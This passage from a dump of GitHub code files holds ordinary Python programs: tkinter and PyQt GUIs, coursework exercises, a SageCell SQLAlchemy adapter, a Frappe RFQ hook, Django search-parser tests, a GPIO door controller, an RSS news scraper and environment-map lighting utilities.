tkinter.Label(frame)\r\nscrambleTxt.pack()\r\n\r\navg_three = tkinter.Label(frame)\r\navg_three.pack()\r\n\r\navg_five = tkinter.Label(frame)\r\navg_five.pack()\r\n\r\navg_twelve = tkinter.Label(frame)\r\navg_twelve.pack()\r\n\r\navg_thirty = tkinter.Label(frame)\r\navg_thirty.pack()\r\n\r\nrefresh = tkinter.Button(btnFrame, text=\"Refresh\", command=refreshAll)\r\nrefresh.pack(side=tkinter.LEFT)\r\ndele = tkinter.Button(btnFrame, text=\"Delete\", command=deleteItem)\r\ndele.pack(side=tkinter.LEFT)\r\n\r\ncbb = tkinter.Listbox(frame) \r\ncbb.pack()\r\n\r\nrefreshAll()\r\n\r\nroot.mainloop()\r\n","repo_name":"MarcelKaemper/cubetimer","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":3199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"19970613108","text":"\"\"\"\nThis program will calculate the area of a circle or triangle\n\"\"\"\n\nprint('The calculator is starting up')\n\noption = raw_input('Enter C for Circle, T for Triangle: ')\n\nif option == 'C' or option == 'c':\n radius = float(raw_input('Enter the radius: '))\n area = round(3.14159 * (radius ** 2), 2)\n print('The area of the circle with a radius of ' + str(radius) + ' is ' + str(area))\n\nelif option == 'T' or option == 't':\n base = float(raw_input('Enter the base: '))\n height = float(raw_input('Enter the height: '))\n area = round((.5 * base * height),2)\n print('The area of a triangle with base %f and height %f is %f' % (base, height, area))\n\nelse:\n print('You entered an option that is not available.')\n print('Please run the program again and choose a valid option')","repo_name":"danielwiet/codecademy_python2_practice","sub_path":"AreaCalculator.py","file_name":"AreaCalculator.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73860681512","text":"\"\"\"\nSQLAlchemy Database Adapter\n---------------------------\n\"\"\"\n\nfrom datetime import datetime\nimport random\nimport string\n\nfrom sqlalchemy import create_engine, Column, Integer, String, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.exc import IntegrityError\n\nimport db\n\n\nBase = declarative_base()\n\n\nclass ExecMessage(Base):\n \"\"\"\n Table of input messages in JSON form.\n \"\"\"\n __tablename__ = \"permalinks\"\n ident = Column(String, primary_key=True, index=True)\n code = Column(String)\n language = Column(String)\n interacts = Column(String)\n created = Column(DateTime, default=datetime.utcnow)\n last_accessed = Column(\n DateTime, default=datetime.utcnow, onupdate=datetime.utcnow)\n requested = Column(Integer, default=0)\n \n def __repr__(self):\n return \"\"\"\\\nident: {}\nCode:\n{}\nInteracts:\n{}\nLanguage: {}\nCreated: {}\nLast accessed: {}\nRequested: {}\"\"\".format(\n self.ident,\n self.code,\n self.interacts,\n self.language,\n self.created,\n self.last_accessed,\n self.requested)\n\n\nclass DB(db.DB):\n \"\"\"\n SQLAlchemy database adapter\n\n :arg db_file str: the SQLAlchemy URI for a database file\n \"\"\"\n\n def __init__(self, db_file):\n self.engine = create_engine(db_file)\n self.SQLSession = sessionmaker(bind=self.engine)\n Base.metadata.create_all(self.engine)\n self.dbsession = self.SQLSession()\n\n async def add(self, code, language, interacts):\n \"\"\"\n See :meth:`db.DB.add`\n \"\"\"\n while True:\n ident = \"\".join(\n random.choice(string.ascii_lowercase) for _ in range(6))\n message = ExecMessage(\n ident=ident,\n code=code,\n language=language,\n interacts=interacts)\n try:\n self.dbsession.add(message)\n self.dbsession.commit()\n except IntegrityError:\n # ident was used before\n self.dbsession.rollback()\n else:\n break\n return ident\n\n async def get(self, key):\n \"\"\"\n See :meth:`db.DB.get`\n \"\"\"\n msg = self.dbsession.query(ExecMessage).filter_by(ident=key).first()\n if msg is None:\n raise LookupError\n msg.requested = ExecMessage.requested + 1\n self.dbsession.commit()\n return (msg.code, msg.language, msg.interacts)\n","repo_name":"sagemath/sagecell","sub_path":"db_sqlalchemy.py","file_name":"db_sqlalchemy.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"72"} +{"seq_id":"11520373352","text":"class Asteroid(object):\r\n def __init__(self):\r\n self.pos = PVector(random(width), random(height))\r\n self.r = int(random(15, 50))\r\n self.edges_num = int(random(5, 15))\r\n \r\n \r\n def render(self):\r\n pushMatrix()\r\n stroke(255)\r\n\r\n translate(self.pos.x, self.pos.y)\r\n # ellipse(0, 0, self.r, self.r)\r\n beginShape()\r\n for i in range(self.edges_num):\r\n angle = map(i, 0, self.edges_num, 0, TWO_PI)\r\n x = self.r * cos(angle)\r\n y = self.r * sin(angle)\r\n vertex(x, y)\r\n endShape(CLOSE)\r\n \r\n \r\n popMatrix()\r\n","repo_name":"zhizdyuks/game1","sub_path":"game/asteroids.py","file_name":"asteroids.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10997507393","text":"def main():\n felipe(\"Item: \")\n\n\ndef felipe(prompt):\n tacos = {\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n }\n\n total = 0\n while True: #\n try:\n item = input(prompt).title() # titlecased\n if item in tacos:\n total += tacos[item]\n print(f\"Total: ${total:.2f}\")\n except EOFError:\n print() #print(end=\"\\n\")\n break\n except KeyError:\n pass\n\n\nmain()\n","repo_name":"berkod-ai/python-basics","sub_path":"w3/pset3/taqueria/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22819801927","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass RequestforQuotation(Document):\n\tpass\n\ndef auto_create_opportunity(doc,method): \n\tfor row in doc.suppliers:\n\t\tfor val in doc.items:\n\t\t\ttag=get_tag(row.supplier)\n\t\t\tif val.qualifier==tag:\n\t\t\t\ttry:\n\t\t\t\t\tcustomer=frappe.db.get_value('Customer',{'is_internal_customer':1,'represents_company':doc.company},'customer_name')\n\t\t\t\t\tcompany=frappe.db.get_value('Supplier',{'is_internal_supplier':1,'supplier_name':row.supplier},'represents_company')\n\t\t\t\t\tcontact_person=frappe.db.get_value('Dynamic Link',{'parenttype':'Contact','link_doctype':'Customer','link_name':customer},'parent')\n\t\t\t\t\tcustomer_address=frappe.db.get_value('Dynamic Link',{'parenttype':'Address','link_doctype':'Customer','link_name':customer},'parent')\n\t\t\t\t\tr_name=frappe.db.get_list('Document Specific Naming Series',filters={'parent':company,'parenttype':'Company'},fields={'*'})\n\t\t\t\t\trfq_name=\"null\"\n\t\t\t\t\tfor tup in r_name:\n\t\t\t\t\t\tif tup.reference_document==\"Opportunity\":\n\t\t\t\t\t\t\trfq_name=tup.series\n\t\t\t\t\tif rfq_name!=\"null\":\n\t\t\t\t\t\tif customer:\n\t\t\t\t\t\t\tif company:\n\t\t\t\t\t\t\t\tcreate_user_permission(row.email_id,'Company',company,True)\n\t\t\t\t\t\t\t\topp_doc=frappe.get_doc(dict(doctype = 'Opportunity',\n\t\t\t\t\t\t\t\t\t\t\topportunity_from = 'Customer',\n\t\t\t\t\t\t\t\t\t\t\tnaming_series=rfq_name,\n\t\t\t\t\t\t\t\t\t\t\tparty_name=customer,\n\t\t\t\t\t\t\t\t\t\t\tcontact_person=contact_person,\n\t\t\t\t\t\t\t\t\t\t\twith_items=1,\n\t\t\t\t\t\t\t\t\t\t\tcustomer_address=customer_address,\n\t\t\t\t\t\t\t\t\t\t\tcontact_display=contact_person,\n\t\t\t\t\t\t\t\t\t\t\tcontact_email=frappe.db.get_value('Contact Email', {'parenttype':'Contact','parent':contact_person},'email_id'),\n\t\t\t\t\t\t\t\t\t\t\tcompany=company,\n\t\t\t\t\t\t\t\t\t\t\treference_no=doc.name,\n\t\t\t\t\t\t\t\t\t\t\tquotation_type=doc.quotation_type,\n\t\t\t\t\t\t\t\t\t\t\topening_date=doc.opening_date,\n\t\t\t\t\t\t\t\t\t\t\tignore_permissions='true')).insert()\t\t\t\n\t\t\t\t\t\t\t\topp_doc.append('items', {\n\t\t\t\t\t\t\t\t\t'item_code': val.item_code,\n\t\t\t\t\t\t\t\t\t'qty': val.qty,\n\t\t\t\t\t\t\t\t\t'uom':val.uom\n\t\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\t\tagent_name=frappe.db.get_value('User',{'email':frappe.session.user},'full_name')\n\t\t\t\t\t\t\t\tagent_company=frappe.db.get_value('User',{'email':frappe.session.user},'represents_company')\n\t\t\t\t\t\t\t\tif agent_company:\n\t\t\t\t\t\t\t\t\topp_doc.add_comment('Comment',agent_name+' created '+opp_doc.name+' from '+agent_company)\n\t\t\t\t\t\t\t\topp_doc.save()\n\t\t\t\t\t\t\t\tdoc.add_comment('Created',' created Opportunity for '+row.supplier)\n\t\t\t\t\t\t\t\tcompanyName=frappe.db.get_value('Item',val.item_code,'company_name')\n\t\t\t\t\t\t\t\tif companyName:\n\t\t\t\t\t\t\t\t\tcreate_user_permission(row.email_id,'Company',companyName,False,'Item')\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfrappe.msgprint(\"Unable to create Opportunity as customer: \"+doc.company+ \" is not associated with any company. Register the Company and submit the document: \"+doc.name+\". As Customer is not associated with any company, don't let MA submit the RFQ document.\")\n\t\t\t\t\t\t\traise frappe.ValidationError(\"Unable to create Opportunity as customer: \" +doc.company+\" is not associated with any company.\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tfrappe.throw(\"Unable to save the Opportunity as the naming series are unavailable . Please provide the naming series at the Company: \"+company+\" to save the document\");\t\t\t\t\t\t\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n@frappe.whitelist()\ndef create_user_permission(user,allow,value,check,applicable_for=''):\n#user,allow,for_value,apply_to_all_doctypes,applicable_for\n docVal=frappe.db.get_list('User Permission', filters={'user':user,'for_value':value,'allow':allow,'apply_to_all_doctypes':check,'applicable_for':applicable_for})\n if not docVal:\n frappe.get_doc(dict(doctype = 'User Permission',\n \tuser = user,\n allow=allow,\n \tfor_value =value,\n \tapply_to_all_doctypes=check,\n \tapplicable_for=applicable_for)).insert()\n\n\n@frappe.whitelist()\ndef delete_user_permission(user,allow,value,check,applicable_for=''):\n#user,allow,for_value,apply_to_all_doctypes,applicable_for\n docVal=frappe.db.get_list('User Permission', filters={'user':user,'for_value':value,'allow':allow,'apply_to_all_doctypes':check,'applicable_for':applicable_for})\n if not docVal:\n frappe.get_doc(dict(doctype = 'User Permission',\n \tuser = user,\n allow=allow,\n \tfor_value =value,\n \tapply_to_all_doctypes=check,\n \tapplicable_for=applicable_for)).delete()\n\n\n@frappe.whitelist()\ndef get_tag(parent):\n\treturn frappe.db.get_value('Tag Link',{'parent':parent},'tag')\n","repo_name":"Sagarikanaik96/seabridge_test","sub_path":"seabridge_app/seabridge_app/doctype/request_for_quotation/request_for_quotation.py","file_name":"request_for_quotation.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42203624507","text":"\"\"\"\n https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/\n https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/solution/ncha-shu-de-ceng-xu-bian-li-python3yan-du-you-xian/\n \n\"\"\"\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if not root: return []\n queue = [root]\n res = []\n while queue:\n # 先从左往右的输出当前层的节点值\n res.append(node.val for node in queue)\n # 更新队列,先从左往右遍历queue中的节点,再遍历从左往右遍历节点的孩子节点\n queue = [child for node in queue for child in node.children]\n return res","repo_name":"zhouyang412/myleetcode","sub_path":"二叉树/429. N 叉树的层序遍历.py","file_name":"429. N 叉树的层序遍历.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33924912603","text":"import sqlite3\nimport time\n\ndef currentTime():\n return time.strftime('%m-%d-%Y_%H%M', time.localtime())\n\n\nprint(\"[{0}] Starting Daily Reset\".format(currentTime()))\ndb_file = r'./mornatk.db'\nconnection = None\ntry:\n print(\"[{0}] Connecting to Database\".format(currentTime()))\n connection = sqlite3.connect(db_file)\nexcept Exception as e:\n print(\"[{0}] Error Connecting to Database\".format(currentTime()))\n print(e)\n\nif connection is not None:\n print(\"[{0}] Resetting DailyXP\".format(currentTime()))\n sql = ''' UPDATE players SET daily = 0'''\n cur = connection.cursor()\n cur.execute(sql)\n connection.commit()\n connection.close\n\n\nprint(\"[{0}] Daily Reset Complete\".format(currentTime()))\n","repo_name":"AntPerez69367/morna-addict","sub_path":"data/dailyReset.py","file_name":"dailyReset.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73353031274","text":"import asyncio\nimport logging\n\nfrom nfcclient.gpio_client import gpio_client\n\n\nclass Door:\n name: str\n pin_id: int\n _opened: bool = False\n _closing_task: any\n\n def __init__(self, name, pin):\n self.name = name\n self.pin_id = pin\n self._closing_task = None\n gpio_client.configure(self.pin_id)\n\n def is_open(self):\n return self._opened\n\n async def open(self, seconds: int, remote: bool = False) -> None:\n # 0 seconds has special meaning which is to shutdown the doors\n if seconds == 0:\n self._cancel_closing_doors()\n self._close()\n return\n\n if self.is_open():\n if remote:\n # if doors are open for remotely opening just cancel scheduled action and set up new\n # otherwise act normally\n self._cancel_closing_doors()\n self._closing_task = asyncio.get_event_loop().call_later(seconds, self._close)\n return\n\n self._open()\n\n self._closing_task = asyncio.get_event_loop().call_later(seconds, self._close)\n\n def _cancel_closing_doors(self):\n if self._closing_task:\n self._closing_task.cancel()\n self._closing_task = None\n\n def _open(self):\n self._opened = True\n logging.info(f\"Door {self.name} OPEN\")\n gpio_client.open(pin=self.pin_id)\n\n def _close(self):\n self._opened = False\n logging.info(f\"Door {self.name} Closed\")\n gpio_client.close(pin=self.pin_id)\n\n def clean(self):\n gpio_client.clean(self.pin_id)\n","repo_name":"devopsbay/raspberry-client","sub_path":"nfcclient/doors/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13688973525","text":"# -*- coding: utf-8 -*-\n\nfrom django.db.models import Q\nfrom django.core.exceptions import ValidationError\n\n\nfrom dynamiq.utils import ParsedStringQBuilder\nfrom dynamiq.tests.forms.haystack import BoatSearchForm\nfrom dynamiq.tests.base import BaseStringParsedQBuilderTests\n\n\nclass StringParsedQBuilderTests(BaseStringParsedQBuilderTests):\n\n form = BoatSearchForm\n\n def test_split_query_string_must_split_on_spaces_unless_in_quotes(self):\n s = \"\"\"daniel AND country!=FR OR -\"Le PEN Marine\" country:FR is_active:1 group=NI\"\"\"\n output = ParsedStringQBuilder.split_query_string(s)\n expected_output = [\n \"daniel\",\n \"AND\",\n \"country!=FR\",\n \"OR\",\n '-\"Le PEN Marine\"',\n \"country:FR\",\n \"is_active:1\",\n \"group=NI\"\n ]\n self.assertEqual(expected_output, output)\n\n def test_split_query_element(self):\n def do(input, output):\n self.assertEqual(\n ParsedStringQBuilder.split_query_element(input),\n output,\n )\n do(\"daniel\", ['daniel'])\n do(\"AND\", ['AND'])\n do(\"country!=FR\", ['country', '!=', 'FR'])\n do(\"OR\", ['OR'])\n do(\"-Le PEN Marine\", ['-Le PEN Marine'])\n do('-\"Le PEN Marine\"', ['-\"Le PEN Marine\"'])\n do(\"country:FR\", ['country', ':', 'FR'])\n do(\"group:Greens/EFA\", ['group', ':', 'Greens/EFA'])\n\n def test_default_filter_is_used_if_not_given(self):\n q = \"Spray\"\n expected = Q(fulltext__contains=\"Spray\")\n self.run_test(q, expected)\n\n def test_simple_search_is_ANDed(self):\n q = \"Pen Duick\"\n expected = Q(fulltext__contains=\"Pen\") & Q(fulltext__contains=\"Duick\")\n self.run_test(q, expected)\n\n def test_search_with_AND_is_ANDed(self):\n q = \"Joshua AND Moitessier\"\n expected = Q(fulltext__contains=\"Joshua\") & Q(fulltext__contains=\"Moitessier\")\n self.run_test(q, expected)\n\n def test_search_with_OR_is_ORed(self):\n q = \"Joshua OR Moitessier\"\n expected = Q(fulltext__contains=\"Joshua\") | Q(fulltext__contains=\"Moitessier\")\n self.run_test(q, expected)\n\n def test_OR_and_AND_can_be_mixed(self):\n q = \"Pen Duick OR Commodore Explorer\"\n Q1 = Q(fulltext__contains=\"Pen\") & Q(fulltext__contains=\"Duick\")\n Q2 = Q(fulltext__contains=\"Commodore\") & Q(fulltext__contains=\"Explorer\")\n expected = Q1 | Q2\n self.run_test(q, expected)\n\n def test_search_field_can_be_defined(self):\n q = \"captain:Tabarly\"\n expected = Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_operator_equal_can_be_used(self):\n q = \"captain=Tabarly\"\n expected = Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_lookup_can_be_negated_on_operator(self):\n q = \"captain!=Tabarly\"\n expected = ~Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n q = \"captain!:Tabarly\"\n expected = ~Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_lookup_can_be_negated_on_value(self):\n q = \"-Tabarly\"\n expected = ~Q(fulltext__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_quoted_terms_are_not_splited(self):\n q = '\"Eric Tabarly\"'\n expected = Q(fulltext__contains=\"Eric Tabarly\")\n self.run_test(q, expected)\n\n def test_quoted_terms_can_be_negated(self):\n q = '-\"Eric Tabarly\"'\n expected = ~Q(fulltext__contains=\"Eric Tabarly\")\n self.run_test(q, expected)\n\n def test_gte_can_be_used(self):\n q = 'year>=1966'\n expected = Q(year__gte=\"1966\")\n self.run_test(q, expected)\n\n def test_lte_can_be_used(self):\n q = 'year<=1966'\n expected = Q(year__lte=\"1966\")\n self.run_test(q, expected)\n\n def test_gte_and_lte_can_be_mixed(self):\n q = 'year>=1966 year<=1978'\n expected = Q(year__gte=\"1966\") & Q(year__lte=\"1978\")\n self.run_test(q, expected)\n\n def test_gt_can_be_used(self):\n q = 'hull>1'\n expected = Q(hull__gt=\"1\")\n self.run_test(q, expected)\n\n def test_lt_can_be_used(self):\n q = 'mast<3'\n expected = Q(mast__lt=\"3\")\n self.run_test(q, expected)\n\n def test_complex_search(self):\n q = \"\"\"captain:Tabarly year>=1966 mast=1 OR captain!=Cammas year<=1999 OR captain=\"Bernard Moitessier\" Joshua\"\"\"\n Q1 = Q(captain__contains=\"Tabarly\") & Q(year__gte=\"1966\") & Q(mast=\"1\")\n Q2 = ~Q(captain__contains=\"Cammas\") & Q(year__lte=\"1999\")\n Q3 = Q(captain__contains=\"Bernard Moitessier\") & Q(fulltext__contains=\"Joshua\")\n expected = Q1 | Q2 | Q3\n self.run_test(q, expected)\n\n def test_do_not_raise_on_error_by_default(self):\n q = 'year>=1966 month=3' # month is invalid, it will be ignored\n expected = Q(year__gte=\"1966\")\n self.run_test(q, expected)\n\n def test_raise_on_error(self):\n q = 'year>=1966 month=3' # month is invalid\n F = ParsedStringQBuilder(q, BoatSearchForm, raise_on_error=True)\n with self.assertRaises(ValidationError):\n query, label = F()\n","repo_name":"liberation/django-dynamiq-search-form","sub_path":"dynamiq/tests/utils/qbuilder/parsedstring.py","file_name":"parsedstring.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"19753610624","text":"import feedparser\r\nfrom dateutil import parser\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nfrom urllib.parse import urlparse\r\nfrom datetime import date, timedelta\r\n\r\nyesterday = date.today() - timedelta(days=1)\r\nformattedY = yesterday.strftime(\"%B %d, %Y\")\r\ntoday = datetime.date.today()\r\nformattedT = today.strftime(\"%B %d, %Y\")\r\n\r\nrss_urls = [\r\n \"https://www.news.com.au/content-feeds/latest-news-national/\",\r\n \"https://www.news.com.au/content-feeds/latest-news-world/\",\r\n \"https://www.7news.com.au/rss/\",\r\n \"https://9news.com.au/just-in/rss\"]\r\n\r\noutputs = []\r\nfor rss_url in rss_urls:\r\n feed = feedparser.parse(rss_url)\r\n\r\n for entry in feed.entries:\r\n\r\n if \"published\" in entry: # 9news&7news\r\n published_date = parser.parse(entry.published)\r\n date_text = published_date.strftime( \"%B %d, %Y\")\r\n response = requests.get(entry.link)\r\n\r\n # Create a BeautifulSoup object from the response content\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n\r\n else: #news.com.au\r\n response = requests.get(entry.link)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n articles = soup.find_all('article')\r\n\r\n for article in articles:\r\n link_element = article.find('a', class_='storyblock_title_link')\r\n if link_element:\r\n link = link_element['href']\r\n else:\r\n link = \" \"\r\n news_date = soup.find('div', class_='byline_publish')\r\n date_text = news_date.text.strip().split(' - ')[0]\r\n\r\n if formattedT == date_text:\r\n title = entry.title\r\n link = entry.link\r\n\r\n\r\n if link.startswith(\"https://www.news.com.au/\"):\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n article = soup.find_all('article', id='story')\r\n article_content = soup.find('div', id='story-primary')\r\n content_text = article_content.text.strip()\r\n\r\n elif link.startswith(\"https://www.9news.com.au/\"):\r\n article_contents = soup.find_all('div', class_='block-content')\r\n content_text = \"\"\r\n for content_div in article_contents:\r\n content_spans = content_div.find_all('span')\r\n for span in content_spans:\r\n content_text += span.text.strip() + \" \"\r\n else:\r\n article_contents = soup.find_all('article')\r\n content_text = \"\"\r\n for content_div in article_contents:\r\n content_paras = content_div.find_all('p')\r\n for p in content_paras:\r\n content_text += p.text.strip() + \" \"\r\n\r\n print(link)\r\n","repo_name":"QueenieX/ICT_web-news","sub_path":"getDaily.py","file_name":"getDaily.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72277119592","text":"import numpy as np\n\n\"\"\"\n In this file, the coordinate system is defined as below:\n Image coordinate system:\n \n --------------> x\n | ***\n | ***\n | ****\n y\n #####################################\n \n Sphere coordinate system:\n vertically angle (elevation) : phi, is the angle between vector and x-z plane\n Image coordinate y range: 0 ~ height\n Sphere coordinate phi range: -0.5*pi ~ 0.5*pi\n \n horizontally angle (azimuth): theta, is the angle between vector and z axis\n Image coordinate x range: 0 ~ width\n Sphere coordinate theta range: -pi ~ pi\n \n #####################################\n World coordinate system:\n z\n /\n /\n /\n --------------> x\n |\n |\n |\n y\n\n\"\"\"\n\n\ndef image_2_world_coordinate(img_x, img_y, width, height):\n \"\"\"\n Given the image coordinate (img_x, img_y) and the size of EnvMap, compute the world coordinates of it.\n Return an normalized vector as numpy array in size (3,) Representing (world_x, world_y, world_z)\n \"\"\"\n theta = img_x * 2 * np.pi / width - np.pi\n phi = (img_y + 0.5) * np.pi / height - np.pi / 2\n return np.array([np.cos(phi) * np.sin(theta), np.sin(phi), np.cos(phi) * np.cos(theta)])\n\n\ndef angle_2_image_coordinate(theta_phi, width, height):\n theta = theta_phi[:, 0]\n phi = theta_phi[:, 1]\n\n x = (theta + np.pi) * width / 2 / np.pi\n y = (phi + np.pi / 2) * height / np.pi - 0.5\n i_x = np.round(x).astype(np.int) % width\n i_y = np.round(y).astype(np.int) % height\n return np.column_stack((i_x, i_y))\n\n\ndef world_2_angle_coordinate(world_p):\n \"\"\"\n Input world_coordinate : (num , 3) like: ([x,y,z], [x,y,z], ...)\n Output angle_coordiante : (num , 2) like: ([theta, phi], [theta, phi], ...)\n \"\"\"\n target_p_x, target_p_y, target_p_z = world_p[:, 0], world_p[:, 1], world_p[:, 2]\n\n r = np.sqrt(np.sum(world_p ** 2, -1))\n\n phi = np.arcsin(target_p_y / r)\n theta = np.arcsin(target_p_x / np.sqrt(target_p_x ** 2 + target_p_z ** 2+1e-10))\n\n idx = np.where((target_p_x < 0) & (target_p_z < 0))\n theta[idx] = - theta[idx] - np.pi\n\n idx = np.where((target_p_x > 0) & (target_p_z < 0))\n theta[idx] = - theta[idx] + np.pi\n\n # if target_p_x > 0 and target_p_z > 0:\n # theta = theta\n # elif target_p_x < 0 and target_p_z < 0:\n # theta = - theta - np.pi\n # elif target_p_x < 0 and target_p_z > 0:\n # theta = theta\n # elif target_p_x > 0 and target_p_z < 0:\n # theta = - theta + np.pi\n return np.column_stack((theta, phi))\n\n\ndef auto_render_coor_to_image_coor(xyz, width=1024, height=512):\n world_p = xyz.copy()\n world_p[:, 2] = xyz[:, 0]\n world_p[:, 1] = -xyz[:, 2]\n world_p[:, 0] = -xyz[:, 1]\n theta_phi = world_2_angle_coordinate(world_p)\n ix_iy = angle_2_image_coordinate(theta_phi, width, height)\n return ix_iy\n\n\ndef normalize(x):\n if len(np.shape(x)) == 1:\n return x / (np.linalg.norm(x) + 1e-12)\n else:\n return x / np.linalg.norm(x, axis=1)[:, np.newaxis]\n\n\ndef normalize_axis(x, axis=None):\n if len(np.shape(x)) == 1:\n return x/(np.linalg.norm(x))\n else:\n return x/np.expand_dims(np.linalg.norm(x, axis=axis), axis=axis)\n\n\ndef calc_foot_point_on_plane(n, v, h=0):\n \"\"\"\n\n :param np.ndarray n: normal vector of plane\n :param np.ndarray v:\n :param float h: plane height\n :return:\n :rtype: np.ndarray\n \"\"\"\n n = np.array(n).flatten() / np.linalg.norm(n)\n v = np.array(v).flatten() / np.linalg.norm(v)\n p = v - (np.dot(n, v) - h) * n\n return normalize(p)\n\n\n# Rotate vector around arbitrary axis\ndef rotateVector(vector, axis, angle):\n cos_ang = np.reshape(np.cos(angle), (-1))\n sin_ang = np.reshape(np.sin(angle), (-1))\n vector = np.reshape(vector, (-1, 3))\n axis = np.reshape(np.array(axis), (-1, 3))\n out = vector * cos_ang[:, np.newaxis] + \\\n axis * np.dot(vector, np.transpose(axis)) * (1 - cos_ang)[:, np.newaxis] + \\\n np.cross(axis, vector) * sin_ang[:, np.newaxis]\n\n return np.reshape(out, (-1))\n\n\ndef vec_2_halfangle(light, view, normal):\n view = np.array(view).reshape(-1)\n normal = np.array(normal).reshape(-1)\n light = np.array(light).reshape(-1)\n H = normalize((view + light) / 2)\n\n theta_h = np.arccos(np.dot(normal, H) / (np.linalg.norm(normal) * np.linalg.norm(H) + 1e-12))\n\n foot_light = calc_foot_point_on_plane(normal, light)\n foot_H = calc_foot_point_on_plane(normal, H)\n t = foot_light\n binormal = normalize(np.cross(normal, t))\n\n phi_h = np.arccos(np.dot(t, foot_H) / (np.linalg.norm(t) * np.linalg.norm(foot_H) + 1e-12))\n\n tmp = rotateVector(light, normal, -phi_h)\n diff = rotateVector(tmp, binormal, -theta_h)\n foot_diff = calc_foot_point_on_plane(normal, diff)\n theta_d = np.arccos(np.dot(normal, diff) / (np.linalg.norm(normal) * np.linalg.norm(diff) + 1e-12))\n\n phi_d = np.arccos(np.dot(t, foot_diff) / (np.linalg.norm(t) * np.linalg.norm(foot_diff) + 1e-12))\n\n return theta_h, theta_d, phi_d\n\n\ndef SurfaceArea_of_EnvMap(height, width):\n \"\"\"\n Given a size of the env_map, compute the cooresponding surface area of each point at a Sphere.\n Return a numpy arrary with size (height, width). And np.sum(surface_area)=1.\n Surface Area of a Sphere formula: S = 2 * pi * R * h . where R is radius of sphere, h is the height of the 'ring'\n \"\"\"\n surface_area = np.empty(shape=(height, width))\n for i in range(height):\n phi_up = np.pi * i / height\n phi_down = np.pi * (i + 1) / height\n h = np.cos(phi_up) - np.cos(phi_down)\n ds = h / width\n surface_area[i, :] = ds\n surface_area = surface_area / np.sum(surface_area)\n return surface_area\n\n\ndef LightDirection_of_EnvMap(height, width):\n \"\"\"\n Given a size of the env_map, compute the cooresponding Light direction as a vector on each point at a Sphere.\n The vector map is computed as like an 'outgoing' vector map.\n Return a numpy arrary with size (height, width, 3). And each point as an normalized vector.\n \"\"\"\n light_vector_map = np.empty(shape=(height, width, 3))\n for img_x in range(width):\n for img_y in range(height):\n light_vector_map[img_y, img_x, :] = image_2_world_coordinate(img_x=img_x, img_y=img_y, width=width, height=height)\n return light_vector_map\n","repo_name":"junxuan-li/LRG_360Panoramic","sub_path":"Lighting_Estimation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"11343691463","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\n\nimport sys\n\n\nclass Window(QMainWindow):\n def __init__(self, app):\n super(Window, self).__init__()\n\n self.screen = app.primaryScreen()\n self.size = self.screen.size()\n self.clicked = 0\n self.window_title = \"AdaptiveClicker\"\n\n self.screen_width = self.size.width()\n self.screen_height = self.size.height()\n\n self.window_width = 800\n self.window_height = 300\n\n self.window_start_pos_x = self.screen_width // 2 - self.window_width // 2\n self.window_start_pos_y = self.screen_height // 2 - self.window_height // 2\n\n self.setWindowTitle(self.window_title)\n self.setGeometry(self.window_start_pos_x, self.window_start_pos_y, self.window_width, self.window_height)\n\n self.main_text = 